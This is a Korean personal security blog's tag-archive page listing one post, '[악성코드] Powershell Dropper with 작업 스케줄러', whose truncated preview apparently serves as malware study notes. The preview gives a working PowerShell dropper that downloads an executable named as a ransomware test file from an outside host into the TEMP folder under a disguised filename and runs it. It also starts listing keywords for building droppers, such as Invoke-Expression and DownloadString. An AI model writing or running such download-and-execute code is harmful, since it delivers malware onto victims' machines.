본문 바로가기

-

검색하기
-
프로필사진 r99bbit

  • 분류 전체보기 (36)
    • Workspace (11)
    • Write-up (5)
      • pwn (5)
      • web (0)
      • crypt (0)
      • forensic (0)
    • Basic (8)
      • pwn (4)
      • web & network (0)
      • crypt (2)
      • android (2)
    • Project (2)
      • 2020-android-bypass-solutio.. (1)
      • 2020-eat-value-project (1)
    • ETC (10)
      • Data Science (10)
      • Tools & Trouble Shoot (0)
Guestbook
Notice
Recent Posts
Recent Comments
Link
  • GitHub
«   2025/05   »
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
  • jadx
  • Nox
  • 작업스케줄러
  • 드랍퍼
  • 과제
  • Dropper
  • adb
  • PowerShell
  • Internet Explorer
  • 파워쉘
  • ida 7.0
  • Frida
  • 보안 강화 구성
  • 미쵸따
  • 안드로이드
more
Archives
Today
Total
관리 메뉴
  • 글쓰기
  • 방명록
  • RSS
  • 관리

목록드랍퍼 (1)

-

[악성코드] Powershell Dropper with 작업 스케줄러

Notion 백업. Powershell Dropper 예제 $client = New-Object System.Net.WebClient $downloadURL = "http://bpsec.co.kr/~minibeef/download/nsr_test_ransomeware.exe" $path = ($env:TEMP) + "\18e190413af045db88dfbd29609eb877.exe" $client.DownloadFile($downloadURL, $path) cd $env:TEMP ./18e190413af045db88dfbd29609eb877.exe Powershell Dropper 만들 때 키워드 Invoke-Expression : 로컬에서 명령어 실행 DownloadString("") : 웹 사이트에..

Workspace 2020. 8. 12. 14:41
Prev 1 Next

Blog is powered by kakao / Designed by Tistory

티스토리툴바